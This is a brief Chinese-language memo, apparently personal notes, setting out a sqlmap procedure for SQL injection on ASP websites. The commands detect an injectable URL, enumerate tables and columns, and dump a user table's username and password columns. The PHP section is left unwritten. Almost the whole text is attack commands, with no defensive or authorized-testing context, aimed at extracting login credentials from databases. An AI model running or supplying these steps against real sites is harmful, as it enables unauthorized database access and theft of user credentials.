为了方面记忆,我把我现在我所知道的用python,sql注入的代码以及大致的过程在这里写下
对于asp网站的sql注入
1.sqlmap -u "所要注入是网站“ //检测是否存在注入漏洞,返回数据库的名字
2.sqlmap -u "网站" --tables //猜解所有的表的名称
3.sqlmap -u "网站" --columns -T "user" // columns 是猜解列的名称, 这里的user是上一步出来的用户表
4.如诺出现username password则 sqlmap -u "网站" --dump -C "username,password" -T "user"
这里的dump是下载数据的意思 猜解表名“username,password"
对于php网站的sql注入
有空更新